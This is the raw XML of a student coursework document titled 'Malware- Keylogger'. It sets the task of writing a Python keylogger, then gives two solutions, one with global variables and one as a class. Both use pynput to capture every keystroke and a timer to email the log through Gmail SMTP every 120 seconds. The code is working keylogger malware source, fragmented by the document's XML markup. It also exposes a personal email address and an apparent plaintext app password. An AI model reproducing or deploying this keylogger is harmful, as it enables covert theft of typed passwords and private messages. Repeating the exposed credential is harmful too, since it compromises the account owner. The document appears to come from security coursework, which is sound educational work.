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9809F" w14:textId="4B5F4AA3" w:rsidR="008A51F8" w:rsidRPr="004D0416" w:rsidRDefault="00E07418" w:rsidP="008A51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\\</w:t>
      </w:r>
      <w:r w:rsidR="008A51F8" w:rsidRPr="004D0416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DF7981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8A51F8" w:rsidRPr="004D0416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86BD1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Malware- Keylogger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07117FCD" w14:textId="5DED1B4F" w:rsidR="008A51F8" w:rsidRPr="004D0416" w:rsidRDefault="008A51F8" w:rsidP="008A51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0416">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Your Name: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000C0B66">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Likith</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000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C0B66">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>kanneganti</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="456093E5" w14:textId="503F301A" w:rsidR="008A51F8" w:rsidRPr="004D0416" w:rsidRDefault="008A51F8" w:rsidP="008A51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0416">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Your Student ID #:</w:t>
      </w:r>
      <w:r w:rsidR="000C0B66">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3007573</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2516896A" w14:textId="30FEE8E5" w:rsidR="008A51F8" w:rsidRPr="004D0416" w:rsidRDefault="008A51F8" w:rsidP="008A51F8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D04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Please submit a word document </w:t>
      </w:r>
      <w:r w:rsidR="0023648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or PDF </w:t>
      </w:r>
      <w:r w:rsidRPr="004D04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to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D04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BlackBoard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D04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after completing all tasks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333A7699" w14:textId="36507CE5" w:rsidR="00D910F0" w:rsidRDefault="00D910F0" w:rsidP="004D04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Please create a keylogger python program by using global variables</w:t>
      </w:r>
      <w:r w:rsidR="00D22CF0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Your keylogger should be able to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D43A41" w14:textId="5C3EE363" w:rsidR="00D22CF0" w:rsidRDefault="00D22CF0" w:rsidP="00D22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 keystrokes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A6399C" w14:textId="52830072" w:rsidR="00D22CF0" w:rsidRDefault="00957FA4" w:rsidP="00D22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D22CF0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>andle</w:t>
      </w:r>
      <w:r w:rsidR="00DD4955">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> one</w:t>
      </w:r>
      <w:r w:rsidR="00D22CF0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> special key</w:t>
      </w:r>
      <w:r w:rsidR="00DD4955">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006F475C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>only (e.g., Space).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58642D33" w14:textId="2084F596" w:rsidR="00D22CF0" w:rsidRPr="00D22CF0" w:rsidRDefault="00957FA4" w:rsidP="00D22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D22CF0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>end an email automatically after every 120 seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF9EE5B" w14:textId="77777777" w:rsidR="00957FA4" w:rsidRDefault="00D910F0" w:rsidP="00957F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Please create a keylogger python program </w:t>
      </w:r>
      <w:r w:rsidRPr="0023648B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>by implementing the Object-Oriented Approach (using class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957FA4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Your keylogger should be able to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396CB4B4" w14:textId="127C4270" w:rsidR="0023648B" w:rsidRDefault="0023648B" w:rsidP="002F0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your key logger is triggered, send the initial email that includes the following message: “Keylogger is trigger, and my name is + </w:t>
      </w:r>
      <w:r w:rsidRPr="0023648B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Your Real Name.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12D5CEB6" w14:textId="3E395B34" w:rsidR="002F0659" w:rsidRDefault="002F0659" w:rsidP="002F0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 keystrokes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDE0DA7" w14:textId="1A19E899" w:rsidR="00957FA4" w:rsidRPr="0023648B" w:rsidRDefault="00957FA4" w:rsidP="00957F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648B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Handle special keys </w:t>
      </w:r>
      <w:r w:rsidR="0023648B" w:rsidRPr="0023648B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23648B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="0023648B" w:rsidRPr="0023648B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pace</w:t>
      </w:r>
      <w:r w:rsidR="0023648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23648B" w:rsidRPr="0023648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and </w:t>
      </w:r>
      <w:r w:rsidR="0023648B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="0023648B" w:rsidRPr="0023648B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nter</w:t>
      </w:r>
      <w:r w:rsidR="0023648B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00BE9CCF" w14:textId="77777777" w:rsidR="00957FA4" w:rsidRPr="00D22CF0" w:rsidRDefault="00957FA4" w:rsidP="00957F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an email automatically after every 120 seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D655C11" w14:textId="215ADF3D" w:rsidR="00D92A79" w:rsidRPr="00D22CF0" w:rsidRDefault="00957FA4" w:rsidP="002F0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197126">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">e </w:t>
      </w:r>
      <w:r w:rsidR="00D92A79">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>imported by other python programs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474DEBC4" w14:textId="388CF41F" w:rsidR="002F0659" w:rsidRDefault="002F0659" w:rsidP="004D0416">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="119D6F5F" w14:textId="631418D5" w:rsidR="00D910F0" w:rsidRDefault="00D910F0" w:rsidP="004D04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Please explain the benefits of using class instead of using global variables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1509877C" w14:textId="299F6D4D" w:rsidR="007D31DB" w:rsidRDefault="007D31DB" w:rsidP="004D0416">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6430E0DD" w14:textId="422F5979" w:rsidR="007D31DB" w:rsidRDefault="007D31DB" w:rsidP="004D0416">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D8852F8" w14:textId="61E3D007" w:rsidR="007D31DB" w:rsidRDefault="007D31DB" w:rsidP="004D0416">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BB097DF" w14:textId="77777777" w:rsidR="007D31DB" w:rsidRDefault="007D31DB" w:rsidP="004D0416">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B05C3FA" w14:textId="06647057" w:rsidR="004D0416" w:rsidRDefault="004D0416" w:rsidP="001E43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------------------Put your </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF7981">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>codes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, screen capture</w:t>
      </w:r>
      <w:r w:rsidR="00DF7981">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> that shows </w:t>
      </w:r>
      <w:r w:rsidR="00DF7981" w:rsidRPr="00DF7981">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>the output</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, or table below this line-----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5636618B" w14:textId="17C4D785" w:rsidR="001E4365" w:rsidRDefault="001E4365" w:rsidP="001E43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Code: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758CC7A7" w14:textId="1E116770" w:rsidR="001E4365" w:rsidRDefault="001E4365" w:rsidP="001E436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DF31D4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pynput.keyboard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 xml:space="preserve"> as keyboard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21874B57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threading</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5E61FA5B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time</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6FCE6646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smtplib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5C3676E0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07B5B7F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= "Key logger is running now "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0771F51A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1E4365">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> an empty project to contain keystroke</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D49161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ADA1327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>#plhkylvhrsezbpzl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1D7BA3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>#likith.k099@gmail.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051CE619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B4044E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process_key_press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(key):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5515F927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global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</w:p>
    <w:p w14:paraId="47043EAF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08E5A089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+ str(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key.char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>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4C5CE4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AttributeError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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48948EB7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    if key ==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key.space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>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0633CDF0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+ " "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C70204C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493A840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+ str(key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAA7245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EEA4CB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634F6F4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report_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365">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F2EE8B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global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</w:p>
    <w:p w14:paraId="4AB626BC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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F8C4C6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365">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>"likith.k099@gmail.com", "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plhkylvhrsezbpzl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")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA1CEE7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C8B27C4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timer =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threading.Timer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 xml:space="preserve">(120,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report_log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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01817EB9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timer.start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>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE71DB4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= " "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406B5975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153C55A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5C70475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365">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>email, password):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F02D299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global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</w:p>
    <w:p w14:paraId="1A56061C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server =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smtplib.SMTP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>("smtp.gmail.com", 587)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7135216F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server.starttls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>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E50812F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server.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365">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>email, password)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1178A43F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server.sendmail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 xml:space="preserve">(email, email,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key_log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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C41B2E4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server.quit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>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F78C2E5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6D9C4E0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B629E9D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keyboard_listener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4365">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>keyboard.Listener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on_press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process_key_press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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716BD3AF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0A4DAEE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keyboard_listener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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6FCE20" w14:textId="77777777" w:rsidR="001E4365" w:rsidRPr="001E4365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report_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E4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365">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CEC212" w14:textId="24F809AD" w:rsidR="00713810" w:rsidRDefault="001E4365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E4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365">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>keyboard_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001E4365">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>listener.join</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001E4365">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A980338" w14:textId="77777777" w:rsidR="00713810" w:rsidRDefault="00713810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CB9E5AB" w14:textId="14C05F3A" w:rsidR="001E4365" w:rsidRDefault="00713810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5A231F" wp14:editId="69C4338A">
            <wp:extent cx="5943600" cy="62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98B1" w14:textId="189AD67B" w:rsidR="00713810" w:rsidRDefault="00713810" w:rsidP="00D52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612370" wp14:editId="458F118E">
            <wp:extent cx="5943600" cy="1655264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41"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1655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2EE53" w14:textId="561DDAB9" w:rsidR="00D529F8" w:rsidRDefault="00D529F8" w:rsidP="001E43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3FB1971" w14:textId="25087845" w:rsidR="00D529F8" w:rsidRDefault="00D529F8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FAAD08" w14:textId="2CD1561C" w:rsidR="00C11183" w:rsidRPr="00C11183" w:rsidRDefault="00495C64" w:rsidP="00C1118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Code: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD5B3B4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BD5166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pynput.keyboard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 xml:space="preserve"> as keyboard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E85A53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1183">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>threading</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3CDDD255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1183">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>time</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="24DAD8DA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smtplib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7ABDF217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D66D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>class Keylogger:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5E79E8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11183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C11183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time_interval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, email, password):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4277772C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KKeylogger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is trigger, and my name is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Likith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Kanneganti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"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C23AE2B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self.time</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C11183">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>_interval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time_interval</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7FDDA9FE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self.email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 xml:space="preserve"> = email</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CF779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self.password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 xml:space="preserve"> = password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332B177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2F508D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process_key_press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self,key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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D31E66D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14:paraId="4E6195B9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+ str(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key.char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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B9C7E8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except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AttributeError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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4236BFC3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if key ==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key.space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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4967635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+ " "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5A259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key ==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key.shift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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03601148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+ "g"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1783B653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32F6465A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+ str(key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF5A704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150065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report_log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(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBD0885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FCAA64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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31216A2A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self.send</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C11183">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>_email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self.email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self.password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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F28AB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BFCCC5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timer =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threading.Timer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self.time_interval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self.report_log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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111F6FF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timer.start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()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E164A3D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"\n "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382AF04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4FF59B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C1118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1183">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>self,local_email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local_password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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308E2F26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B39799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server =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smtplib.SMTP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("smtp.gmail.com", 587)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CBBDC5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server.starttls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()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783C0BB3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server.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C11183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1183">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>local_email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local_password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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3299C9C4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server.sendmail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local_email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local_email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self.key_log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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DE21DE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server.quit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()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C62E4B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EADB9E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gmail_execute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(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F83DA6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keyboard_listener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keyboard.Listener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on_press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self.process_key_press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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2361EFE2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3C7E20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keyboard_listener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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBF8756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1183">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>self.report</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C11183">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>_log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()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B7D5DF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8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keyboard_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C11183">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>listener.join</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C11183">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B948781" w14:textId="77777777" w:rsidR="00C11183" w:rsidRP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991AFE" w14:textId="62E907DC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11183">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>my_gmail_keylogger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11183">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Keylogger(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C11183">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>120,"likith.k099@gmail.com", "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plhkylvhrsezbpzl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C11183">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>gmail_execute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C11183">
        <w:rPr>
